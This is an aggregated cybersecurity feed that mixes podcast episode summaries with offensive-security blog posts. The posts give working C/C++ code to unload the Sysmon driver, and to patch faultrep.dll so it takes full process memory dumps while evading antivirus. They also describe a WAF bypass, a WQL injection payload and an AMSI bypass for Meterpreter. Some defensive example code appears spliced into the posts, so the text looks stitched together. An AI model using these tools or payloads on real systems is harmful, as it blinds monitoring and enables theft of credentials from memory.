
Take your career to the next level with CompTIA and Infosec Skills | Guest Patrick Lane

By: Infosec
19 December 2019 at 08:00

Whether you’re new to cybersecurity or an experienced professional, CompTIA has a certification for you — and training for those certifications is easier than ever with the new on-demand training platform Infosec Skills. This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Patrick Lane, CompTIA Director of Products, and Jeff Peters, Product Marketing Manager for Infosec. In this podcast, you'll get an overview of CompTIA certifications, learn about potential IT and security career paths and hear questions from live viewers about training and certifications.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast


Stay safe when shopping online | Guest Sam Bouso

By: Infosec
16 December 2019 at 08:00

Sam Bouso, Founder of Precognitive Inc, and Cyber Work podcast host Chris Sienko discuss current security risks in online retail, fraud prevention, online shopping behavior, and how some fraud prevention strategies can actually hurt online retailers.


Cognitive biases in security decision-making | Guest Kelly Shortridge

By: Infosec
9 December 2019 at 08:00

Kelly Shortridge, VP of Product Strategy at Capsule8, and Cyber Work Podcast host Chris Sienko discuss how to introduce security teams early in the product development process, as well as cognitive biases in security decision-making at all levels, from analysts to CISOs.


Cybersecurity needs in megacorporations | Guest Gene Yoo

By: Infosec
2 December 2019 at 08:00

Gene Yoo, who has worked for Sony, Warner Bros, Coca-Cola and other megacorporations, and Cyber Work podcast host Chris Sienko discuss the specific security needs of these large companies, how to recover from cyber attacks, career strategies, and gender parity in cybersecurity.


Hacking since age six | Guest Nir Gaist

By: Infosec
25 November 2019 at 08:00

Nir Gaist, Founder and CTO at Nyotron, and Cyber Work podcast host Chris Sienko discuss Nir's cybersecurity journey (which started with hacking at the age of six), the cyber skills gap and how to present yourself to hiring managers.


2020 election cybersecurity strategies | Guest Bob Stevens

By: Infosec
18 November 2019 at 08:00

Bob Stevens, VP of Americas at Lookout, and Cyber Work Podcast host Chris Sienko, discuss election cybersecurity strategies, tips and ramifications for 2020.


The ROI of security awareness training | Guest Michael Osterman and Lisa Plaggemier

By: Infosec
14 November 2019 at 08:00

Security awareness programs help organizations achieve the ultimate goal of fewer security incidents, but how do the benefits compare to the costs and time requirements? A new study by Osterman Research uses data from 230 organizations to answer this question and quantify the ROI of security awareness training for both large and small organizations. This episode of the Cyber Work Podcast is a rebroadcast of a webinar featuring Michael Osterman, President and Analyst at Osterman Research, and Lisa Plaggemier, Chief Evangelist at Infosec. In this podcast, you'll learn how to calculate security awareness ROI at your organization, the opportunity cost of not having an awareness program and the costs and returns of security awareness training.


Hyperspecialization in cybersecurity | Guest John Wheeler

By: Infosec
11 November 2019 at 08:00

John Wheeler, Vice President of Security at Topcoder, and Cyber Work host Chris Sienko discuss hyperspecialization in cybersecurity and coding.


Insider tips from a cybersecurity CEO | Guest Scott Madsen

By: Infosec
4 November 2019 at 08:00

Scott Madsen, CEO of Cingo Solutions, and Cyber Work host Chris Sienko discuss transferring into cybersecurity from another career, the importance of transparency in job listings and ways to fix the cyber skills gap.


How being hacked inspired a comic book series | Guest Gary Berman

By: Infosec
28 October 2019 at 07:00

Gary Berman, creator of The Cyberhero Adventures: Defenders of the Digital Universe comic book series, and Cyber Work host Chris Sienko discuss Berman's long history of being hacked, how he overcame it, and his new cybersecurity comic book series, which aims to educate others through his mistakes.


Privacy is shaping the future of cybersecurity careers: Are you ready? | Guest Byron Johnson

By: Infosec
24 October 2019 at 07:00

Celebrate National Cybersecurity Awareness Month by learning about privacy with IAPP's Channel Sales Manager Byron Johnson — plus get 30 days of free training with Infosec Skills! This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Byron Johnson. In this podcast, you'll learn everything you need to know about the shifting privacy landscape, including how privacy is changing cybersecurity, privacy skills and how they apply to different cybersecurity roles, the future of online privacy and data protection laws and privacy certification and career questions from live viewers.


Networking, engineering and education | Guest Tia Hopkins

By: Infosec
21 October 2019 at 07:00

Tia Hopkins, Vice President of Global Sales Engineering at eSentire, and Cyber Work host Chris Sienko discuss Hopkins' past in physical networking, her pursuit of education and how she advanced her career.


Engineering, cybersecurity and changing careers | Guest Dave Farrow

By: Infosec
14 October 2019 at 07:00

Dave Farrow discusses his unconventional career journey and the intersection of engineering and cybersecurity.


Bypassing the WebARX Web Application Firewall (WAF)

12 October 2019 at 22:16

WebARX is a web application firewall that is meant to protect your website from malicious requests. It was covered by The Hacker News and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

I found that the WebARX WAF can be bypassed easily by adding a whitelist string to the request: if the WAF detects a whitelist string anywhere in the request, it does not process the request at all.

Let's first try it on their own website. This is a simple LFI payload.

Now, if I include a whitelist string such as ithemes-sync-request, it is bypassed.

XSS PoC

Here's an XSS PoC where we pass a simple script tag. When the request is sent normally, the WAF detects it.

But if we include the ithemes-sync-request parameter, which is a whitelist string, the script tag is executed.

LFI PoC

Here's a normal payload, which is blocked.

Once we add the whitelist string, it is bypassed.

SQLi PoC

Here's a normal payload, which is blocked.

Once we add the whitelist string, it is bypassed.

These whitelist strings are more like a kill switch for this firewall. I'm not quite sure the developers of this project understand the logic behind it. It's more like code written by an amateur programmer for a university assignment.
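The following model, added here and not WebARX code, shows why a substring allowlist is a kill switch and what a scoped exemption looks like instead. The attack signatures, the admin-ajax.php endpoint, the POST requirement and the token format are assumptions made for the example; the post only tells us that the string ithemes-sync-request switches inspection off. The requests are constructed inline.

```cpp
#include <algorithm>
#include <cctype>
#include <map>
#include <string>
#include <vector>

// Constructed request model for the example: method, path and the decoded
// parameters. A real WAF works on the raw HTTP request; the model keeps only
// what the two policies below need.
struct Request {
    std::string method;
    std::string path;
    std::map<std::string, std::string> params;
};

// Hypothetical attack signatures, lower-cased (not WebARX's rule set).
static const std::vector<std::string> kAttackPatterns = {
    "<script", "../", "' or ", "union select", "/etc/passwd"};

// The "whitelist string" the post reports. The endpoint it is tied to is an
// assumption for the example.
static const std::string kSyncParam = "ithemes-sync-request";
static const std::string kSyncPath = "/wp-admin/admin-ajax.php";

static std::string lower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return s;
}

static bool looks_malicious(const std::string& value) {
    const std::string v = lower(value);
    for (const auto& p : kAttackPatterns)
        if (v.find(p) != std::string::npos) return true;
    return false;
}

// Flawed policy, modelled on the behaviour the post describes: if the
// whitelist string occurs anywhere in the request, inspection is skipped
// entirely. Anyone can append the string, so it is a kill switch.
bool flawed_waf_blocks(const Request& r) {
    for (const auto& kv : r.params)
        if (kv.first == kSyncParam || kv.second.find(kSyncParam) != std::string::npos)
            return false;
    for (const auto& kv : r.params)
        if (looks_malicious(kv.second)) return true;
    return false;
}

// Hardened policy: the exemption is scoped to one parameter on one endpoint
// and one method, and every other parameter is still inspected. The exempt
// value must also pass a structural check (here: base64-like payload),
// because "skip the rules" must never mean "accept anything".
static bool is_token_like(const std::string& v) {
    if (v.empty() || v.size() > 4096) return false;
    for (unsigned char c : v)
        if (!(std::isalnum(c) || c == '+' || c == '/' || c == '=')) return false;
    return true;
}

bool hardened_waf_blocks(const Request& r) {
    for (const auto& kv : r.params) {
        const bool exempt = r.method == "POST" && r.path == kSyncPath &&
                            kv.first == kSyncParam && is_token_like(kv.second);
        if (exempt) continue;
        if (looks_malicious(kv.second)) return true;
    }
    return false;
}
```

The difference is where the allowlist decision is made: the flawed policy decides once for the whole request, the hardened one decides per parameter, so adding the magic string to an unrelated request buys the attacker nothing.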

Thanks for checking it, we also messaged you, but never heard back. Unfortunately for the sake of balancing false negatives, even more advanced WAFs tend to have ways for bypass (especially with XSS). Thanks for your help and we'll definitely work on improvements!

— WebARX (@webarx_security) October 8, 2019

Combating phishing, malware and hackers | Guest Atif Mushtaq

By: Infosec
7 October 2019 at 07:00

Atif Mushtaq, founder and CEO of SlashNext, and Cyber Work host Chris Sienko discuss the current and future trends of web-based phishing and malware attacks.


WQL Injection

6 October 2019 at 21:59

Generally, in application security, user input must be sanitized. When it comes to SQL injection, the root cause is most of the time that the input is not sanitized properly. I was curious about Windows Management Instrumentation Query Language (WQL), which is the SQL of WMI. Can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see, I use the IWbemServices::ExecQuery method to execute the query and enumerate the returned instances with the IEnumWbemClassObject::Next method.

// The user-supplied service name is spliced straight into the query text; that is the bug being demonstrated.
BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrieve Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
ULONG numElems = 0;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, &numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
	}
	clsObj->Release(); // release each instance before fetching the next one
	clsObj = NULL;
}

Once the user enters a service name, the application displays its members.

I wondered whether it is possible to make the condition always true and return all the services of the target host, like id=1 or 1=1 in SQLi, where we make the statement logically true.
Since the user input is not sanitized, we can close the string literal, append an or clause and enumerate every service with the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.

This is just a simple demonstration to prove WQL injection; I'm sure there are better cases to demonstrate it. Extended WQL, a superset of WQL, can be used to combine statements and do more interesting things. It is used by System Center Configuration Manager (SCCM). Always sanitize the input of the application.
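As an added example (not the demo application's code), here is the vulnerable query construction beside a hardened builder. The hardened version bounds the name to what a Windows service name can be (at most 256 characters, no forward or back slashes, no control characters) and then renders it as a WQL string literal using WQL's backslash escapes, so the payload above becomes part of the literal rather than WQL syntax. The column list is this example's choice. If you can avoid a WHERE clause altogether (query all instances and compare Name on the client side), the string-building problem disappears entirely.

```cpp
#include <stdexcept>
#include <string>

// Unsafe construction, exactly as the demo application does it: the user
// input is spliced into the WQL text, so a quote in the input ends the
// literal and the rest of the input becomes WQL.
std::string unsafe_service_query(const std::string& name) {
    return "SELECT * FROM win32_service where Name='" + name + "'";
}

// Windows service names are at most 256 characters and may not contain
// forward or back slashes; quotes and spaces are legal, so this check is a
// sanity bound, not the defence against injection.
bool valid_service_name(const std::string& name) {
    if (name.empty() || name.size() > 256) return false;
    for (unsigned char c : name)
        if (c == '/' || c == '\\' || c < 0x20 || c == 0x7f) return false;
    return true;
}

// Renders a WQL string literal. WQL uses backslash escapes inside quoted
// strings, so the two characters that could break out of the literal, the
// backslash and the single quote, are escaped. '%' and '_' need no
// treatment here because the query compares with '=' rather than LIKE.
std::string wql_literal(const std::string& value) {
    std::string out = "'";
    for (char c : value) {
        if (c == '\\' || c == '\'') out += '\\';
        out += c;
    }
    out += '\'';
    return out;
}

// Hardened construction: validate, then quote. Throws instead of returning
// a partially built query so callers cannot forget to check a result code.
std::string safe_service_query(const std::string& name) {
    if (!valid_service_name(name))
        throw std::invalid_argument("not a valid service name");
    return "SELECT Name, ProcessId, PathName, Description FROM Win32_Service WHERE Name = " +
           wql_literal(name);
}
```

Feed the injection payload from the post into both builders: the unsafe one yields a query with a second, attacker-controlled condition, the safe one yields a query whose only condition is an exact match against the literal string the attacker typed.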

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Execute assembly via Meterpreter session - Part 2

6 October 2019 at 00:00

I recently pushed some updates to the project after an exchange of ideas on the possibility of creating a PR against the Metasploit master branch.

The most significant are:

Module

  1. Added the ability to inject HostingCLR into an existing process via the PID parameter
  2. Added the ability to specify the process to be created instead of notepad.exe
  3. Added a parameter to enable/disable the AMSI bypass
  4. Refactored the code to comply with Metasploit best practices

DLL

  1. Added detection of the CLR version the assembly needs, so that the correct one is loaded; this also adds support for .NET 3.5 assemblies
  2. Added a check for a CLR already loaded in the process; if one is present, a new one is not instantiated
  3. Added an AMSI bypass using the AmsiScanBuffer patching technique

In the first part I focused more on the Ruby code, because the implementation of the HostingCLR DLL was almost the same as the one Etor Madiv presented in his original project. In this second part we instead focus on improving the DLL so that it is feasible for a PR on the Metasploit main branch.

How to find which CLR version is needed

To load the correct CLR version we need to know which version the assembly requires. Furthermore, the check must work on a byte array, because that is all the module has at that point.

The first thing that comes to mind is to look for a signature inside the byte array that identifies the version. A Windows executable, EXE or DLL, must conform to the PE file format. A standard Windows PE file is divided into sections:

  1. MS-DOS header
  2. PE header
  3. optional header
  4. Native Image Section (.data, .rdata, .rsrc, .text)

These are the standard sections of a typical Windows executable. The C/C++ compiler allows you to add your custom sections to the PE file using a #pragma compiler directive.

What about the CLR? Metadata and IL code live in an extension of the COFF/PE format.

The CLR data part contains metadata and IL code, both determine how the program will be executed. Compilers for the CLR must issue both the CLR header and the data information in the generated PE file, otherwise the resulting PE file will not be executed in the CLR. The CLR header holds a number of relevant details required by the runtime, like Runtime, MetaData directory and Entry point token.

MS Docs

So now we know that it is possible to extract the version. Opening a .NET assembly in HxD, we can see how the version string changes when the same project is rebuilt with different target frameworks, which gives us the signatures to search for.

.Net 4.0

.Net 3.5

CLR v4.0.30319 - 76 34 2E 30 2E 33 30 33 31 39
CLR v2.0.50727 - 76 32 2E 30 2E 35 30 37 32 37
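As an added example, not code from the HostingCLR project, the following parser extracts the version string from an assembly held in a byte array and maps it to the runtime to host. It goes slightly beyond the raw byte-signature search above: instead of matching the bare bytes of "v4.0.30319", it locates the CLI metadata root by its "BSJB" signature and checks the fixed header fields around it (ECMA-335 II.24.2.1), which cuts down on false positives from the string appearing elsewhere in the image. The test images are constructed inline and are not real assemblies.

```cpp
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Little-endian field readers that make no alignment assumptions.
static uint32_t le32(const std::vector<uint8_t>& b, size_t off) {
    return b[off] | (b[off + 1] << 8) | (b[off + 2] << 16) | (uint32_t(b[off + 3]) << 24);
}
static uint16_t le16(const std::vector<uint8_t>& b, size_t off) {
    return uint16_t(b[off] | (b[off + 1] << 8));
}

// Scans a raw assembly image for the CLI metadata root:
//   Signature 0x424A5342 ("BSJB"), MajorVersion 1, MinorVersion 1,
//   Reserved 0, Length, then the NUL-padded UTF-8 version string.
// Returns the version string (e.g. "v4.0.30319") or "" if none is found.
// The signature scan is the same shortcut the post takes; the by-the-book
// route is PE header -> CLI header (data directory 14) -> MetaData RVA.
std::string clr_version_from_image(const std::vector<uint8_t>& img) {
    static const uint8_t kMagic[4] = {'B', 'S', 'J', 'B'};
    for (size_t i = 0; i + 16 <= img.size(); ++i) {
        if (std::memcmp(&img[i], kMagic, 4) != 0) continue;
        const uint16_t major = le16(img, i + 4);
        const uint16_t minor = le16(img, i + 6);
        const uint32_t reserved = le32(img, i + 8);
        const uint32_t length = le32(img, i + 12);
        // Reject false positives: a stray "BSJB" in data will rarely carry
        // the fixed 1/1/0 header and a sane length behind it.
        if (major != 1 || minor != 1 || reserved != 0) continue;
        if (length == 0 || length > 256 || i + 16 + length > img.size()) continue;
        std::string version(reinterpret_cast<const char*>(&img[i + 16]), length);
        return version.substr(0, version.find('\0'));  // drop the NUL padding
    }
    return "";
}

// Maps the metadata version to the runtime that has to be hosted:
// v2.x covers .NET 2.0, 3.0 and 3.5 assemblies; v4.x covers 4.0 and later.
std::string runtime_to_host(const std::string& metadata_version) {
    if (metadata_version.rfind("v4.", 0) == 0) return "v4.0.30319";
    if (metadata_version.rfind("v2.", 0) == 0) return "v2.0.50727";
    return "";  // v1.x or not a managed image: refuse rather than guess
}
```

The caller loads the runtime named by runtime_to_host and refuses to proceed on an empty result; guessing v4 for an unknown image is how you end up with a hosting failure deep inside the target process instead of a clean error in the module.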

Load CLR only if needed

Another interesting idea is to load the CLR only when necessary.

For example, we could pass powershell.exe as the PROCESS parameter, which we know is a .NET process, or locate the PID of a process that already has the CLR loaded, and load the assembly using the runtime that is already available.

This can be done by enumerating the runtimes loaded in the process through ICLRMetaHost::EnumerateLoadedRuntimes.

If the required runtime is already loaded, use it without creating a new one.

Amsi bypass

Starting with .NET Framework 4.8, the Antimalware Scan Interface (AMSI) is also integrated into the CLR, which means that the Assembly.Load call is subject to AMSI scanning.

For the AMSI bypass I opted for the AmsiScanBuffer patching technique.

30 days of free training! | Breaking into cybersecurity with CompTIA | Guest James Stanger

By: Infosec
3 October 2019 at 07:00

Celebrate National Cybersecurity Awareness Month by learning how to start a cybersecurity career with CompTIA's Chief Technology Evangelist James Stanger — plus get 30 days of free training with Infosec Skills! This episode of the Cyber Work Podcast is a rebroadcast of a live webinar featuring James Stanger. In this podcast, you'll learn everything you need to know about getting started in cybersecurity, including using the CompTIA career path to build your skills and land your first cybersecurity job, why Security+ has become the go-to entry-level cybersecurity certification, the different types of entry-level cybersecurity jobs available and how you can train to earn your next CompTIA certification.


The future of cybersecurity training: Subscription-based learning | Guest Jason Dion

By: Infosec
30 September 2019 at 07:00

Jason Dion, a cybersecurity training leader and an Infosec Skills course author, and Cyber Work host Chris Sienko discuss subscription-based cybersecurity training, study strategies and the skills gap.


Digital forensics, data analysis and data recovery | Guest Allan Buxton

By: Infosec
23 September 2019 at 07:00

Allan Buxton, Director of Forensics at SECUREDATA, Inc., and Cyber Work host, Chris Sienko, discuss Allan's career journey, how digital forensics play into both government and civil sectors, and a day in the life as a director of forensics.


Unloading the Sysmon Minifilter Driver

22 September 2019 at 14:51

The binary fltMC.exe is used to manage minifilter drivers; you can load and unload minifilters with it. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged (by application control or EDR rules, for example), we can unload the minifilter ourselves by calling FilterUnload, which is the Win32 equivalent of FltUnloadFilter. It calls the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine, exactly as fltMC does: a non-mandatory unload, which the filter is free to refuse.
Calling this API requires SeLoadDriverPrivilege, and enabling that privilege requires administrative rights.

Here's a simple C program I wrote that calls the FilterUnload API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c

#include "stdafx.h"
#include <Windows.h>
#include <tchar.h>
#include <stdio.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling FilterUnload, which is the Win32 equivalent of FltUnloadFilter.
It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
In this code we are unloading the "SysmonDrv" minifilter.
You need administrative privileges to enable SeLoadDriverPrivilege.
*/
typedef NTSTATUS(WINAPI *_RtlAdjustPrivilege)(
	ULONG Privilege, BOOL Enable,
	BOOL CurrentThread, PULONG Enabled);

int _tmain(int argc, _TCHAR* argv[]) {
	ULONG t;
	HRESULT unload;
	LPCWSTR driver = L"SysmonDrv";
	_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandleW(L"ntdll"), "RtlAdjustPrivilege");
	if (!RtlAdjustPrivilege) {
		wprintf(L"Could not resolve ntdll!RtlAdjustPrivilege\n");
		return 1;
	}
	// 012 is octal for 10, i.e. SE_LOAD_DRIVER_PRIVILEGE. Enabling it only works if the
	// token already holds the privilege, which is why an elevated admin token is needed.
	RtlAdjustPrivilege(012, TRUE, FALSE, &t);
	unload = FilterUnload(driver);
	if (unload == S_OK)
		wprintf(L"Minifilter Successfully Unloaded\n");
	else
		wprintf(L"An Error Occurred: 0x%08X. Check Privs.\n", unload);
	return unload == S_OK ? 0 : 1;
}

Note that when the Filter Manager unloads a minifilter driver, the unload is logged in the System event log, so this is not a silent operation.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

Alissa Knight talks API security, formjacking and hacking | Guest Alissa Knight

By: Infosec
16 September 2019 at 07:00

Alissa Knight, Senior Analyst at Aite Group, discusses API security, the Magecart hacking group, recent breaches, formjacking skimmers and her upcoming book.


From hacker to lawyer: An expert in cybersecurity law | Guest Bradley Gross

By: Infosec
9 September 2019 at 07:00

Bradley Gross, founder and president of Law Office of Bradley Gross and an expert in technology and digital law, discusses his career arc from hacker to lawyer and the various layers of cybersecurity law.


MiniDumpWriteDump via Faultrep!CreateMinidump

8 September 2019 at 21:18

I came across this old undocumented API, CreateMinidumpW, inside faultrep.dll on Windows XP and Windows Server 2003. It ends up calling dbghelp!MiniDumpWriteDump to dump the process, loading dbghelp.dll dynamically at runtime.

The function takes three arguments. I have no clue what the structure behind the third argument looks like. I passed 0 as the pointer to the structure, so by default we end up with 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)



This is the call stack

dbgcore.dll!_MiniDumpWriteDump@28
faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)	
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)	
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you can see, it loads dbghelp.dll with the LoadLibraryExW API and calls dbghelp!MiniDumpWriteDump.

However, faultrep.dll!InternalGenerateMinidumpEx does not produce a full dump. It either passes 0x21, or, depending on a value in the structure passed as the third argument, 0x325.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules	

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules

What you can do is patch that constant to 0x2, which is MiniDumpWithFullMemory. You can find the 64-bit version of the patched DLL here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is the PoC for calling the API. You can copy the DLL from Windows XP and it will work fine. Not sure how this is useful. Just sharing what I found 🙂

#include <windows.h>
#include <tchar.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
/*
Title: Faultrep!CreateMinidump to get a full dump passing MiniDumpWithFullMemory as the MINIDUMP_TYPE.
Author: Osanda Malith Jayathissa (@OsandaMalith)
Research: https://osandamalith.com/2019/09/08/minidumpwritedump-via-faultrepcreateminidump/
The function CreateMinidump is only available in Windows XP and Windows Server 2003.
*/
typedef int(WINAPI *CreateMinidumpProc)(DWORD, LPCWSTR, struct tagSMDumpOptions *);
typedef NTSTATUS(WINAPI *_RtlAdjustPrivilege)(
	ULONG Privilege, BOOL Enable,
	BOOL CurrentThread, PULONG Enabled);

// Returns the PID of the first process whose image name matches (case-insensitive), or 0 if none does.
static DWORD FindProcessId(LPCWSTR Name) {
	DWORD PID = 0;
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (snapshot == INVALID_HANDLE_VALUE) return 0;
	PROCESSENTRY32 processEntry = {};
	processEntry.dwSize = sizeof(PROCESSENTRY32);
	if (Process32First(snapshot, &processEntry)) {
		do {
			if (_wcsicmp(processEntry.szExeFile, Name) == 0) {
				PID = processEntry.th32ProcessID;
				break;
			}
		} while (Process32Next(snapshot, &processEntry));
	}
	CloseHandle(snapshot);
	return PID;
}

int _tmain(int argc, _TCHAR* argv[]) {
	if (argc < 2) {
		wcerr << "[~] Usage: " << argv[0] << " Process Name" << endl;
		return -1;
	}
	LPCWSTR Name = argv[1];
	wstring FileName(Name);
	ULONG t;
	wcout << "[~] Faultrep!CreateMinidump Undocumented API from Windows XP and Windows Server 2003" << endl;
	wcout << "[+] Author: Osanda Malith Jayathissa (@OsandaMalith)" << endl;
	wcout << "[+] Website: https://osandamalith.com" << endl;
	DWORD PID = FindProcessId(Name);
	if (PID == 0) {
		wcout << "[-] Process Name Not Found!" << endl;
		return -1;
	}
	wcout << "[+] Got " << Name << " PID: " << PID << endl;
	_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandleW(L"ntdll"), "RtlAdjustPrivilege");
	// faultrep.dll is loaded by name, so on systems other than XP/2003 the copied DLL must sit next to the executable.
	CreateMinidumpProc CreateMinidump = (CreateMinidumpProc)GetProcAddress(LoadLibraryW(L"faultrep.dll"), "CreateMinidumpW");
	if (!RtlAdjustPrivilege || !CreateMinidump) {
		wcout << "[-] Could not resolve ntdll!RtlAdjustPrivilege or faultrep!CreateMinidumpW" << endl;
		return -1;
	}
	// 20 == SE_DEBUG_PRIVILEGE, needed to open processes running as another user.
	RtlAdjustPrivilege(20, TRUE, FALSE, &t);
	CreateMinidump(PID, (FileName + L"_dump.dmp").c_str(), 0);
	return 0;
}

UPDATE: I wrote a hot patch for both the 32-bit and 64-bit faultrep DLLs. It lets you get a full process dump by passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit. On other systems, copying the original DLLs into the same folder will work fine. You can find the repo with the DLL files here: https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

#include <windows.h>
#include <tchar.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
/*
Title: Faultrep!CreateMinidump Hot Patch to get a full dump passing MiniDumpWithFullMemory as the MINIDUMP_TYPE.
Author: Osanda Malith Jayathissa (@OsandaMalith)
Research: https://osandamalith.com/2019/09/08/minidumpwritedump-via-faultrepcreateminidump/
The function CreateMinidump is only available in Windows XP and Windows Server 2003.
If you want to get this working on other Windows systems, copy the DLL from XP or Server 2003 and place it in the same folder.
This DLL has no ASLR enabled and therefore the addresses are hardcoded.
32-bit Windows XP faultrep.dll = 6945AEBF push 21
32-bit Windows Server 2003 faultrep.dll = 6950BD5E add ecx,21
64-bit Windows XP faultrep.dll = 7FF6E010945 mov r9d,21
*/
typedef int(WINAPI *CreateMinidumpProc)(DWORD, LPCWSTR, struct tagSMDumpOptions *);
typedef NTSTATUS(WINAPI *_RtlAdjustPrivilege)(
	ULONG Privilege, BOOL Enable,
	BOOL CurrentThread, PULONG Enabled);

// Returns the PID of the first process whose image name matches (case-insensitive), or 0 if none does.
static DWORD FindProcessId(LPCWSTR Name) {
	DWORD PID = 0;
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (snapshot == INVALID_HANDLE_VALUE) return 0;
	PROCESSENTRY32 processEntry = {};
	processEntry.dwSize = sizeof(PROCESSENTRY32);
	if (Process32First(snapshot, &processEntry)) {
		do {
			if (_wcsicmp(processEntry.szExeFile, Name) == 0) {
				PID = processEntry.th32ProcessID;
				break;
			}
		} while (Process32Next(snapshot, &processEntry));
	}
	CloseHandle(snapshot);
	return PID;
}

// Patches the 0x21 immediate (MiniDumpWithDataSegs | MiniDumpWithUnloadedModules) inside
// InternalGenerateMinidumpEx to 0x2 (MiniDumpWithFullMemory). The offsets are relative to
// CreateMinidumpW and only valid for the DLL builds listed above, so the byte is verified first.
static bool PatchDumpType(CreateMinidumpProc CreateMinidump) {
#ifndef _WIN64
	UCHAR *Patch = (UCHAR*)CreateMinidump + 0x72CC;
	//Windows Server 2003
	//UCHAR *Patch = (UCHAR*)CreateMinidump + 0x7C51;
#else
	UCHAR *Patch = (UCHAR*)CreateMinidump + 0xBF47;
#endif
	if (*Patch != 0x21) return false; // unknown build: do not corrupt code we have not checked
	DWORD old;
	if (!VirtualProtect((LPVOID)Patch, sizeof(UCHAR), PAGE_EXECUTE_READWRITE, &old)) return false;
	*Patch = 0x2; // MiniDumpWithFullMemory
	VirtualProtect((LPVOID)Patch, sizeof(UCHAR), old, &old);
	return true;
}

int _tmain(int argc, _TCHAR* argv[]) {
	if (argc < 2) {
		wcerr << "[~] Usage: " << argv[0] << " Process Name" << endl;
		return -1;
	}
	LPCWSTR Name = argv[1];
	wstring FileName(Name);
	ULONG t;
	wcout << "[~] Faultrep!CreateMinidump Undocumented API from Windows XP and Windows Server 2003" << endl;
	wcout << "[+] Author: Osanda Malith Jayathissa (@OsandaMalith)" << endl;
	wcout << "[+] Website: https://osandamalith.com" << endl;
	DWORD PID = FindProcessId(Name);
	if (PID == 0) {
		wcout << "[-] Process Name Not Found!" << endl;
		return -1;
	}
	wcout << "[+] Got " << Name << " PID: " << PID << endl;
	_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandleW(L"ntdll"), "RtlAdjustPrivilege");
	CreateMinidumpProc CreateMinidump = (CreateMinidumpProc)GetProcAddress(LoadLibraryW(L"faultrep.dll"), "CreateMinidumpW");
	if (!RtlAdjustPrivilege || !CreateMinidump) {
		wcout << "[-] Could not resolve ntdll!RtlAdjustPrivilege or faultrep!CreateMinidumpW" << endl;
		return -1;
	}
	if (!PatchDumpType(CreateMinidump)) {
		wcout << "[-] Patch location does not hold the expected 0x21; is this one of the listed faultrep.dll builds?" << endl;
		return -1;
	}
	wcout << "[+] Dumping" << endl;
	// 20 == SE_DEBUG_PRIVILEGE, needed to open processes running as another user.
	RtlAdjustPrivilege(20, TRUE, FALSE, &t);
	CreateMinidump(PID, (FileName + L"_dump.dmp").c_str(), 0);
	return 0;
}

Some uses 😉

I was in an engagement today and tried with success the CreateMinidump_HotPatch of @OsandaMalith in both win2003 x32 and Win10 x64. Especially in Windows 10 Symantec did not complain at all!!! pic.twitter.com/kKS1KqEqpa

— m3g9tr0n (@m3g9tr0n) September 10, 2019

Ask an expert: How to start and advance your cybersecurity career | Guest Keatron Evans

By: Infosec
5 September 2019 at 07:00

